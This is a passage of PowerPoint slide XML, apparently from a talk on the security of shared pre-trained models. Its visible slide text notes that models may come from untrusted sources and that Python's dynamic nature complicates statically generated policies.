        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162825" y="3140275"/>
            <a:ext cx="2103600" cy="205500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="CC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Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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6" name="Shape 326"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p31"/>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328" name="Google Shape;328;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Model Ecosystem Facilitates Model Sharing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="329" name="Google Shape;329;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785409" y="2972484"/>
            <a:ext cx="985001" cy="985001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964510" y="1117031"/>
            <a:ext cx="3408600" cy="1220100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9D9D9"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="E0E0F1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="331" name="Google Shape;331;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5051911" y="1028484"/>
            <a:ext cx="3057969" cy="1129096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332" name="Google Shape;332;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="333" name="Google Shape;333;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4509106" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Google Shape;334;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-8991">
            <a:off x="5105893" y="1986951"/>
            <a:ext cx="344101" cy="903300"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Google Shape;335;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10791009">
            <a:off x="7863409" y="1987810"/>
            <a:ext cx="344101" cy="902700"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8650">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17325">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="83075" lIns="83075" spcFirstLastPara="1" rIns="83075" wrap="square" tIns="83075">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1272"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Google Shape;337;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209770" y="2700774"/>
            <a:ext cx="571706" cy="549645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693482"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="Google Shape;339;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5897095" y="2693470"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="340" name="Google Shape;340;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152519" y="3139570"/>
            <a:ext cx="975450" cy="975450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3029">
            <a:off x="6481201" y="1986862"/>
            <a:ext cx="340500" cy="894600"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="434343"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8550">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="605975" y="1197500"/>
            <a:ext cx="34086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1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="343" name="Google Shape;343;p31" title="PikPng.com_user-icon-png_398374.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7510100" y="2950112"/>
            <a:ext cx="1029724" cy="1029724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702026"/>
            <a:ext cx="566100" cy="544500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="17150">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="82300" lIns="82300" spcFirstLastPara="1" rIns="82300" wrap="square" tIns="82300">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1259"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="345" name="Google Shape;345;p31"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209583" y="2702014"/>
            <a:ext cx="566175" cy="544316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="1438999"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The open model ecosystem lets engineers share and reuse pre-trained models.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296525" y="2571749"/>
            <a:ext cx="4027500" cy="626100"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Models may come from </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>untrusted sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>, inviting security risks.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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24" name="Shape 824"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="825" name="Google Shape;825;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Overcoming Python Analysis Challenges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="826" name="Google Shape;826;p67"/>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827" name="Google Shape;827;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879300" y="934275"/>
            <a:ext cx="7385400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Challenge:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Python is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>dynamic language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but policies are generated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="828" name="Google Shape;828;p67"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419100" y="1875075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2723550"/>
                <a:gridCol w="3931925"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Issue</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Mitigation</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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2" name="Shape 832"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="833" name="Google Shape;833;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
